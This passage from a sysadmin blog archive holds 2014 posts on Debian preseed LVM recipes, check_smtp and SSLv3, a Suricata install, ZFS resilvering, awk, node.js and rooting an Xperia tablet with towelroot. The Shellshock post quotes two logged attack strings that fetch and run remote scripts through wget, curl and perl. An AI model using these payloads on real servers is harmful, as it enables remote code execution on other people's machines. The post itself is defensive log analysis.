
Using preseed to create two volume groups on same disk
Wednesday - Oct 22nd 2014

The following preseed partman recipe allows you to create two volume groups on the same disk (/dev/sda):

d-i partman-auto/disk string /dev/sda
d-i partman-auto/method string lvm
d-i partman-auto/choose_recipe select mypartitioning

d-i partman-auto/expert_recipe string \
      mypartitioning :: \
              512 512 512 ext2                                \
                      $primary{ }                             \
                      $bootable{ }                            \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext2 }    \
                      label{ boot }                           \
                      mountpoint{ /boot }                     \
              . \
              122880 122880 122880 ext4                       \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda2 }                     \
                      vg_name{ vg1 }                          \
              . \
              122880 1000000000 1000000000 ext4               \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda3 }                     \
                      vg_name{ vg2 }                          \
              . \
              8192 8192 8192 linux-swap                       \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ swap }                         \
                      method{ swap } format{ }                \
              . \
              10240 10240 10240 ext4                          \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ root }                         \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ root }                           \
                      mountpoint{ / }                         \
              . \
              8192 8192 8192 ext4                             \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ var }                          \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ var }                            \
                      mountpoint{ /var }                      \
              .

This will create:

  • a primary partition with a size of ~500MB (the installed OS reports it as 473MB), mounted on /boot
  • another primary partition with a size of ~122GB (installed OS: 114GB), used as PV for the volume group vg1
  • another primary partition with a minimum size of ~122GB that grows to use the rest of the disk, used as PV for the volume group vg2
  • a swap partition with a size of 8GB as LV "swap" in the volume group vg1
  • a root (/) partition with a size of 10GB as LV "root" in the volume group vg1
  • a /var partition with a size of 8GB as LV "var" in the volume group vg1
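
To run such a recipe fully unattended you usually also need the usual partman confirmation preseeds. The following lines are a sketch based on the standard Debian example preseed file, not part of the recipe above, so adjust them to your installer version:

d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman-lvm/device_remove_lvm boolean true
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm_nooverwrite boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true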


 

Using Nagios check_smtp -S without SSLv3 (sslv3 alert handshake failure)
Tuesday - Oct 21st 2014

The recently discovered CVE-2014-3566 (nicknamed POODLE) has caused a lot of reconfiguration work all over the Internet. After 18 years in service (SSLv3 was published in 1996!), SSLv3 suddenly needed to be disabled everywhere.

While on the HTTP side most browsers have been using TLS for a long time, the story is different for the SMTP protocol. A typical example is the Nagios plugin check_smtp, which can be used with the parameter "-S" to check the mail server via STARTTLS.

After disabling SSLv3 on the remote mail server, Nagios went wild and reported an alert (CRITICAL - Cannot make SSL connection).
When running the plugin manually, more information is shown:

./check_smtp -H mailserver.example.com -S
CRITICAL - Cannot make SSL connection.
140449663530656:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:
CRITICAL - Cannot create SSL context.

It looks like check_smtp wants to use SSLv3, no matter what (hence the "sslv3 alert handshake failure").

Before you think "Oh! My Nagios plugins are old. That must be it!" - BUZZ! Nope, it doesn't matter whether you are using nagios-plugins 1.4.16 or the newest 2.0.3 (believe me, I've tried both).
The reason for this is openssl, which is used in the background by check_smtp:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
139976003229344:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:

The error looks familiar, doesn't it? So let's check out the openssl version:

openssl version
OpenSSL 1.0.1 14 Mar 2012

Ugh. That's quite old, given all the openssl hiccups in the past year. Let's check out the OS:

cat /etc/issue.net
Ubuntu 12.04.5 LTS

OK. To be honest: I expected a more recent version on an Ubuntu LTS - although it's not the newest LTS.

Let's compare this to a Debian Wheezy.

cat /etc/issue.net
Debian GNU/Linux 7

openssl version
OpenSSL 1.0.1e 11 Feb 2013

That looks newer. Wow, Debian is newer! (insider joke :) )

Let's do the same tests as before:

./check_smtp --help
check_smtp v1.4.16 (nagios-plugins 1.4.16)

./check_smtp -H mailserver.example.com -S
SMTP OK - 0.360 sec. response time|time=0.359723s;;;0.000000

Here it works, simply because openssl is able to connect to the remote mail server without using SSLv3:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
depth=1 C = US, O = "GeoTrust, Inc.", CN = RapidSSL CA
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
 0 s:/serialNumber=XXXXXXXXXXXX/OU=GT12345678/OU=See www.rapidssl.com/resources/cps (c)14/OU=Domain Control Validated - RapidSSL(R)/CN=mailserver.example.com
   i:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
 1 s:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
   i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]

So before you blame your monitoring plugins, make sure your openssl version is able to handle TLS.
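
If you want to verify this independently of the plugin, you can force the protocol version in openssl s_client. This is a quick sketch against the example host above; the -tls1 and -ssl3 options are only available if your openssl build includes support for the respective protocol:

# should succeed on a server that has SSLv3 disabled but TLS enabled
openssl s_client -connect mailserver.example.com:25 -starttls smtp -tls1

# should fail with a handshake error, confirming SSLv3 is really switched off
openssl s_client -connect mailserver.example.com:25 -starttls smtp -ssl3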

 

Network Intrusion Detection System with Suricata on Debian Wheezy
Wednesday - Oct 8th 2014

Suricata is a network intrusion detection system (NIDS) that aims to become the "next Snort" - Snort being the de facto standard among NIDS. Both Suricata and Snort are rule-based, and their rules are compatible with each other.

On Debian Wheezy there's the following package available in the repository:

root@debian-wheezy:~# apt-cache show suricata
Package: suricata
Version: 1.2.1-2
Installed-Size: 3809
Maintainer: Pierre Chifflier
Architecture: amd64
Depends: libc6 (>= 2.4), libcap-ng0, libgcrypt11 (>= 1.4.5), libgnutls26 (>= 2.12.17-0), libhtp1 (>= 0.2.6), libmagic1, libnet1 (>= 1.1.2.1), libnetfilter-queue1 (>= 0.0.15), libnfnetlink0 (>= 1.0.0), libpcap0.8 (>= 1.0.0), libpcre3 (>= 8.10), libprelude2, libyaml-0-2
Recommends: oinkmaster, snort-rules-default
Description-en: Next Generation Intrusion Detection and Prevention Tool
 Suricata is a network Intrusion Detection System (IDS). It is based on
 rules (and is fully compatible with snort rules) to detect a variety of
 attacks / probes by searching packet content.

However, there are two big downsides to this package:

1) It is old. In the Wheezy repo Suricata is at version 1.2.1, while the sources of 2.0.4 were released in September.
2) It doesn't work. I don't know if I did something wrong, but I installed the package on two newly installed virtual machines and nothing was ever logged. Not even local attacks simulated with nikto.

When I installed Suricata from the latest source package, it immediately started to work. That's why this article is about running Suricata from source.

1) Install prerequisites
The following packages are enough to compile Suricata on a minimal Debian Wheezy.

apt-get install build-essential pkg-config libpcre3 libpcre3-dbg libpcre3-dev libyaml-0-2 libyaml-dev \
autoconf automake libtool libpcap-dev libnet1-dev zlib1g zlib1g-dev libmagic-dev libcap-ng-dev \
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0

2) Download and unpack
Download the newest release (at the time of this writing this was 2.0.4) and unpack it.

cd /root/src; wget http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz
tar -xzf suricata-2.0.4.tar.gz; cd suricata-2.0.4

3) Compile
A little side note for the compile step: if you want to use Suricata as both an IDS (Intrusion Detection System) AND an IPS (Intrusion Prevention System), you must use "--enable-nfqueue" as a configure option. You can also simply compile with this option just to be IPS-ready; the final switch has to be done in the configuration file anyway.
With the following configure line, the program will use the following folders:

/usr/bin: For the executable binary (/usr/bin/suricata)
/etc/suricata: Config files (most importantly suricata.yaml)
/etc/suricata/rules: Rule files
/var/log/suricata: Log files
/var/run/suricata: pid file

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

The output at the end is the following:

Generic build parameters:
  Installation prefix (--prefix):          /usr
  Configuration directory (--sysconfdir):  /etc/suricata/
  Log directory (--localstatedir) :        /var/log/suricata/

  Host:                                    x86_64-unknown-linux-gnu
  GCC binary:                              gcc
  GCC Protect enabled:                     no
  GCC march native enabled:                yes
  GCC Profile enabled:                     no

To build and install run 'make' and 'make install'.

You can run 'make install-conf' if you want to install initial configuration
files to /etc/suricata/. Running 'make install-full' will install configuration
and rules and provide you a ready-to-run suricata.

To install Suricata into /usr/bin/suricata, have the config in
/etc/suricata and use /var/log/suricata as log dir, use:
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/

Then run make followed by make install-full, which downloads the additional Emerging Threats rules right into /etc/suricata/rules (thanks!):

make
make install-full

/usr/bin/wget -qO - http://rules.emergingthreats.net/open/suricata-2.0/emerging.rules.tar.gz | tar -x -z -C "/etc/suricata/" -f -

You can now start suricata by running as root something like '/usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

If a library like libhtp.so is not found, you can run suricata with:
'LD_LIBRARY_PATH=/usr/lib /usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

While rules are installed now, it's highly recommended to use a rule manager for maintaining rules.
The two most common are Oinkmaster and Pulledpork. For a guide see:
https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Rule_Management_with_Oinkmaster
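
As a minimal sketch of how Oinkmaster could be wired up with the paths used in this article (the config excerpt and paths are illustrative and need to be adapted to your setup):

# /etc/oinkmaster.conf (excerpt): point Oinkmaster at the Emerging Threats ruleset for Suricata
url = http://rules.emergingthreats.net/open/suricata-2.0/emerging.rules.tar.gz

# download and merge updated rules into the Suricata rules folder
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules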

4) Adapt the configuration
The configuration file is, as mentioned above, /etc/suricata/suricata.yaml. It is in YAML format, but just edit the file with your favorite editor (mine is vim).
I suggest you go through the config file from top to bottom to learn as much as possible and to adapt the configuration to your environment, but the following points are the settings I changed. Note that I didn't activate IPS with these config changes.

Disable console logging and log to file instead:

  # Define your logging outputs.  If none are defined, or they are all
  # disabled you will get the default - console output.
  outputs:
  - console:
      enabled: no
  - file:
      enabled: yes
      filename: /var/log/suricata/suricata.log

Define your HOME_NET (the private LAN your machine is connected to):

  # Holds the address group vars that would be passed in a Signature.
  # These would be retrieved during the Signature address parsing stage.
  address-groups:

    HOME_NET: "[192.168.112.0/24]"

Adapt the host-os-policy and set your machine's IP address next to the matching policy (yes, Debian is a Linux distro, duh!):

# Host specific policies for defragmentation and TCP stream
# reassembly.  The host OS lookup is done using a radix tree, just
# like a routing table so the most specific entry matches.
host-os-policy:
  # Make the default policy windows.
  windows: []
  bsd: []
  bsd-right: []
  old-linux: []
  linux: [192.168.112.136]
  old-solaris: []
  solaris: []
  hpux10: []
  hpux11: []
  irix: []
  macos: []
  vista: []
  windows2k3: []

Set the correct paths for the classification and reference config files (they should now be in the rules folder):

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config

5) Start Suricata
Now let's start Suricata in daemon mode (-D) and see what happens... (that's exciting!)

suricata -c /etc/suricata/suricata.yaml -i eth0 -D
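
To quickly verify that the daemon actually came up, something simple like this does the job (a generic sketch, nothing Suricata-specific about it):

# is the process running?
ps aux | grep [s]uricata

# watch the program log for startup messages or errors
tail -f /var/log/suricata/suricata.log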

Suricata immediately starts to write log files into /var/log/suricata:

ls -ltr
total 360
drwxr-xr-x 2 root root   4096 Oct  8 21:49 files
drwxr-xr-x 2 root root   4096 Oct  8 21:49 certs
-rw-r----- 1 root root      0 Oct  8 21:52 http.log
-rw-r--r-- 1 root root    545 Oct  8 21:52 suricata.log
-rw-r--r-- 1 root root   3998 Oct  8 21:52 stats.log
-rw-r----- 1 root root 233626 Oct  8 21:52 unified2.alert.1412797965
-rw-r----- 1 root root 111321 Oct  8 21:52 fast.log

These logs are very important and quickly explained:

http.log: Logs traffic/attacks to a local web server
suricata.log: The program's log file (which we have defined in the configuration file)
stats.log: Continued logging of statistics
unified2.alert.TIMESTAMP: The alerts are logged into this file in barnyard2 (by2) format
fast.log: Clear text logging of alerts

Now the unified2.alert log file is very interesting. In combination with barnyard2 (https://github.com/firnsy/barnyard2) the alerts can be read and stored into an external place, for example syslog or into a data base. I might follow up on this with a dedicated article...
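
As a rough sketch of what such a barnyard2 call could look like (the config file and waldo/bookmark file paths are purely illustrative, not taken from this setup):

barnyard2 -c /etc/suricata/barnyard2.conf \
          -d /var/log/suricata \
          -f unified2.alert \
          -w /var/log/suricata/barnyard2.waldo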

6) Test an attack
I mentioned "nikto" above, which can be used to test-attack a web server. Let's do this and see how Suricata reacts:

root@attacker:~/nikto-master/program# ./nikto.pl -h 192.168.112.136 -C all

Holy sh!t... I'll only post the last few lines of the output:

tail /var/log/suricata/http.log
10/08/2014-22:29:20.464061 192.168.112.136 [**] /solr/admin/ [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006808) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.466145 192.168.112.136 [**] /html/vergessen.html [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006809) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.468097 192.168.112.136 [**] /typo3/install/index.php [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006810) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.470129 192.168.112.136 [**] /dnnLogin.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006811) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.474056 192.168.112.136 [**] /dnn/Login.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006812) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.476151 192.168.112.136 [**] /tabid/400999900/ctl/Login/portalid/699996/Default.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006813) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.478121 192.168.112.136 [**] /Portals/_default/Cache/ReadMe.txt [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006814) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.480445 192.168.112.136 [**] /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006816) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.483119 192.168.112.136 [**] /typo3_src/ChangeLog [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006817) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.487481 192.168.112.136 [**] /_about [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006818) [**] 192.168.112.133:41243 -> 192.168.112.136:80

In total Suricata discovered and logged more than 20'000 attacks:

cat /var/log/suricata/http.log  | grep -c Nikto
22475

Far fewer entries are logged in the fast.log:

tail /var/log/suricata/fast.log
10/08/2014-22:28:28.744886  [**] [1:2221028:1] SURICATA HTTP Host header invalid [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:40924 -> 192.168.112.136:80
10/08/2014-22:28:45.976806  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41028 -> 192.168.112.136:80
10/08/2014-22:29:07.430596  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.432698  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.435637  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.438709  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:11.417867  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 CF F6 6D 00 0C 29 3D 0D 45 08 00 45 00 0B 84 8B 5D 40 00 40 06 41 B8 C0 A8 70 85 C0 A8 ]
10/08/2014-22:29:12.076980  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 3D 0D 45 00 0C 29 CF F6 6D 08 00 45 00 11 2C CE AB 40 00 40 06 F8 C1 C0 A8 70 88 C0 A8 ]
10/08/2014-22:29:19.187059  [**] [1:2221007:1] SURICATA HTTP invalid content length field in request [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:41235 -> 192.168.112.136:80

So this is how you get a new Suricata version installed quickly and painlessly on a Debian Wheezy. Enjoy.

 

ZFS is still resilvering when 100% done
Tuesday - Oct 7th 2014

On a Solaris 10 server I needed to replace a disk in a ZFS pool by using a spare drive:

zpool replace mypool c4t69d0 c5t65d0

ZFS then began to resilver the drive:

zpool status                          
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 0h0m, 0.00% done, 199h10m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  16.6M resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

After almost 11 hours, the scrub line mentioned 100% done, but the status was still resilvering:

 zpool status
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 10h45m, 100.00% done, 0h0m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  480G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Is the status line wrong? Can I ignore it? Or is the 100% simply wrong? I came across this post in the FreeNAS.org forums where the OP was basically told to be patient and... just wait. So that's what I did, too. And indeed, a few hours later the resilvering finished:

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Note that another 6GB were resilvered in the meantime. So there is no technical way to speed this up; it just takes patience.
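
If you don't want to keep polling the pool by hand, a simple loop like the following does the waiting for you (a sketch; adjust the pool name and interval to taste):

while zpool status mypool | grep "resilver in progress" > /dev/null; do
    date
    zpool status mypool | grep scrub
    sleep 600
done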

In the end I just needed to detach c4t69d0:

zpool detach mypool c4t69d0

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            c5t65d0    ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t85d0      AVAIL  

 

awk issue when trying to sort variables with same values
Monday - Sep 29th 2014

One month ago I wrote about a way to "Use bash to compare remote cpu load and print lowest value of array".

Today I encountered an issue with exactly this command:

# for server in server01 server02 server03 server04; do
  case $server in
    server01) load[1]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server02) load[2]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server03) load[3]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server04) load[4]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
  esac
done

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<min{min=$1;pos=NR}END{print pos}'

#

No position was returned - just an empty line.
Why's that? Let's take a look at all the values in the array "load":

# echo "${load[*]}"
0.05 0.05 0.05 0.05

So all array entries contain exactly the same value. Because the comparison in the awk command is a strict "less than" ($1<min), no element is ever smaller than the first one, pos is never set, and an empty line is printed.

The solution to this is to do a "lower or equal" comparison (note the "<="):

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<=min{min=$1;pos=NR}END{print pos}'
4

When all values are the same, awk will end up returning the position of the last found value.
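
An alternative (a small variation I did not use above) is to initialize pos on the first line as well; then the position of the first minimum is returned instead of the last one:

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$1;pos=1}NR>1 && $1<min{min=$1;pos=NR}END{print pos}'
1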

 

Are there any shellshock attacks (in Apache access logs)?
Friday - Sep 26th 2014

Yes, Shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually being exploited? Are people attacking?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.
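
For reference, this is roughly the kind of search I ran; the pattern matches the "() {" function definition used by the exploit. The log path is just an example, adjust it to your own vhost layout:

grep -rF '() {' /var/log/apache2/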

 

node js: Fix bodyParser error (is no longer bundled with Express)
Tuesday - Sep 16th 2014

Let me begin with this: I am no professional with node.js. Hell, it's the first time I'm working on a node.js script. So you can imagine my eyebrows going up when I saw this error after moving an existing script to a newer platform:

nodejs /home/myscripts/callMe
Error: Most middleware (like bodyParser) is no longer bundled with Express and must be installed separately. Please see https://github.com/senchalabs/connect#middleware.
    at Function.Object.defineProperty.get (/home/myscripts/node_modules/express/lib/express.js:89:13)
    at Object.<anonymous> (/home/myscripts/lib/callMe/app.js:16:17)
    at Module._compile (module.js:456:26)
    at Object.Module._extensions..js (module.js:474:10)
    at Module.load (module.js:356:32)
    at Function.Module._load (module.js:312:12)
    at Module.require (module.js:364:17)
    at require (module.js:380:17)
    at Object.<anonymous> (/home/myscripts/sbin/callMe:2:1)
    at Module._compile (module.js:456:26)

The app.js contained the following definitions at the beginning:

var app = express();
app.use(express.bodyParser());

According to this stackoverflow question, the "Express" module has removed the bodyParser function in newer versions. Instead of using this function as part of Express, it can now be used as its own module:

var app = express();
// Disabled because it's not working anymore
//app.use(express.bodyParser());
// ... use body-parser package instead
var bodyParser = require('body-parser');
app.use(bodyParser());

I just needed to install the node.js module body-parser on the system:

npm install body-parser

And then the script was working again.

 

Sony Xperia Tablet Z with Kitkat: Fix for permission denied on sd card
Thursday - Sep 11th 2014

I have owned a Sony Xperia Tablet Z since December 2013 and until this week I never had a reason to rant about it. Hell, I even decided to stay with the original Sony Android version and not install CyanogenMod, because Sony did a fine job and didn't f%ck up Android as much as other device vendors do. The amount of Sony bloatware is limited and not intrusive... but let's get back to my rant.

If you prefer, skip my rant and go straight to the solution.

I use my tablet for mainly two things:
- To be able to work remotely on my servers (see article Remote SSH work on Android tablet with ConnectBot and physical keyboard)
- To watch movies when I'm travelling long distances

Since the last device update to build number 10.5.A.0.230, admittedly a while ago, I cannot use my SD card anymore. I usually use the AndSMB app to transfer the movie I want to prepare for the trip directly from my NAS onto the SD card. It used to work flawlessly, but when I copied two days ago, I got a "Permission denied" error in the AndSMB app. At first I suspected a bug in the AndSMB application, because there had been a recent update of the app, too. I also rebooted the tablet, just to make sure it wasn't a mounting issue of the AndSMB app. I tried the transfer again yesterday and the "Permission denied" was still there. So I got curious, opened the "File Manager" app and tried to manually create a file on my SD card (which had worked before), and got an "Operation Failed." error which appeared for about 2 seconds at the bottom of the app.

At this point I realized that with the update to build 10.5.A.0.230 I had also received Android version 4.4, also known as KitKat. Now search for "KitKat sd card" and you get thousands of websites cussing and swearing about Google having removed write access to the (external) SD card for all apps (except their own!). See this Google+ post by Tod Liebeck for a good summary of what exactly changed in KitKat. He sums it up so that every idiot can understand it:

"What this means is that with KitKat, applications will no longer be able create, modify, or remove files and folders on your external SD card."

Google, just what the hell were you thinking?! Yes, OK, applications can no longer just create files in a chaotic and anarchic way. But what about users like me who want to place large media files on the SD card, on purpose? What about applications running on the SD card? They stop working because they can no longer write to the folder they were installed/moved into. On top of this, there seems to have been no information at all about this change, so users and application developers were left in the dark and had to spend time figuring out what the hell is going on and why such permission errors occur. Agreed, power users, not the usual oh-free-wifi-internet-hipster in Starbucks.

After a couple of minutes of research on this newly introduced limitation of Android (with a couple of swear words leaving my mouth), I was thinking of formatting the tablet completely and installing CyanogenMod 11 on it. According to this Reddit post, CM seems to have removed the SD card write limitations. But before that I wanted to see if I could somehow fix it myself. After all I'm a Linux Sys Engineer and Android runs on Linux (somewhat, but not exactly)... I installed the "Terminal Emulator" app and navigated to the SD card path:

u0_a44@SGP321: / $ cd /storage
u0_a44@SGP321: /storage $ ll
d---r-x---  root  sdcard_r     2014-09-11 09:00 emulated
lrwxrwxrwx  root  root         1971-01-05 19:16 sdcard0 -> /storage/emulated/legacy
drwxrwx--x  root  sdcard_r     2014-09-11 08:57 sdcard1

I tried to change the folder permissions of sdcard1 (which is the external SD card) to 777:

u0_a44@SGP321: /storage $ chmod 777 sdcard1

But that didn't work. The permissions stayed the same (Note: Even as root you cannot change that folder's permissions because of enabled SELinux).
Maybe it's just an issue with the FAT filesystem, I thought, and so I checked the Google Play store for an app to completely re-format the SD card to ext4 - but to my big surprise my search for "sd card" showed the app "SDFix: KitKat Writable MicroSD" by NextApp as one of the first results. Wow! That's exactly what I need!!! But the app's description mentions that root access is required. As I hadn't rooted my tablet, I needed to find a way to root the device first. A quick search for "root xperia z tablet" pointed me to quite a lot of results, some with long manuals, some to discussion threads in the xda forums. In the xda forums the name "towelroot" appeared very often. And that's where the solution for this whole SD card write permission issue starts.

The solution: How to fix your KitKat SD card write permission issue yourself

General information and disclaimer: You do this at your own risk. If you brick your device it's your own fault.
I did these steps successfully on a Xperia Z Tablet (model number SGP321) running on Android 4.4.2 and build 10.5.A.0.230 with Kernel version 3.4.0-perf-g32ce454.

1. Download towelroot application to root your device
On your tablet, open a browser and navigate to https://towelroot.com/. Click on the red sign to download the application package "tr.apk".

2. Install towelroot
On your tablet you will find the downloaded tr.apk in the "Downloads" folder. Launch a file explorer and click on tr.apk. Your system might tell you that the current settings do not allow installing apps from untrusted sources. In this case go to Settings -> Security and under "Device Administration" enable "Unknown sources". Now you can install tr.apk:

[Screenshot: Towelroot installation]

Funnily enough, a warning appears that Google does not recommend the installation of this package. Well Google, you left me no choice!

[Screenshot: Towelroot installation warning]

3. Root the device
This sounds complicated but it is the easiest thing ever thanks to the towelroot application by geohot (yes, that's the guy who hacked the PlayStation!). Launch the towelroot application and click on the "make it ra1n" button.

[Screenshots: towelroot on the Xperia Tablet Z, before and after rooting]

If the rooting process was successful, the following text appears: "Thank you for using towelroot! You should have root, no reboot required.". 

Amazing. It worked. Becoming root in "Terminal Emulator" now works. 

[Screenshot: root shell in Terminal Emulator]

4. Install SDFix
Now that the tablet is rooted, you can install the SDFix application from Google Play.

[Screenshot: SDFix app download]

Once installed, launch SDFix. The application itself works like an installer on Windows - just click your way through.

[Screenshots: SDFix installation steps]

After you see the green "Complete" page, you must reboot your tablet. Otherwise applications still can't write to the SD card.

5. Create a file or folder on the SD card with File Explorer
To test both console and application permissions, I first created a folder "Movies" in /storage/sdcard1 in the "Terminal Emulator" as root:

root@SGP321: / $ cd /storage/sdcard1
root@SGP321: /storage/sdcard1 $ mkdir Movies
root@SGP321: /storage/sdcard1 $ chmod 777 Movies
root@SGP321: /storage/sdcard1 $ ll
drwxrwx--x  root  sdcard_r      2014-09-10 20:14 Android
drwxrwx---  root  sdcard_r      2014-09-10 20:14 LOST.DIR
drwxrwx---  root  sdcard_r      2014-09-11 20:30 Movies
-rwxrwx---  root  sdcard_r      2014-09-11 20:07 customized-capability.xml
-rwxrwx---  root  sdcard_r      2014-09-11 20:07 default-capability.xml

And then created a folder within Movies in "File Explorer" app:

[Screenshots: creating a folder on the SD card with the File Explorer app on KitKat]

That's it! Success! And I'm back to being a happy user again.

 

Rsnapshot does not remove LV snapshot when mount failed
Thursday - Sep 11th 2014

On a system running rsnapshot as local backup method, the rsnapshot process failed and the backup didn't run correctly.

After analyzing the logs, it appears that rsnapshot does not remove a logical volume snapshot if the snapshot could not be mounted successfully:

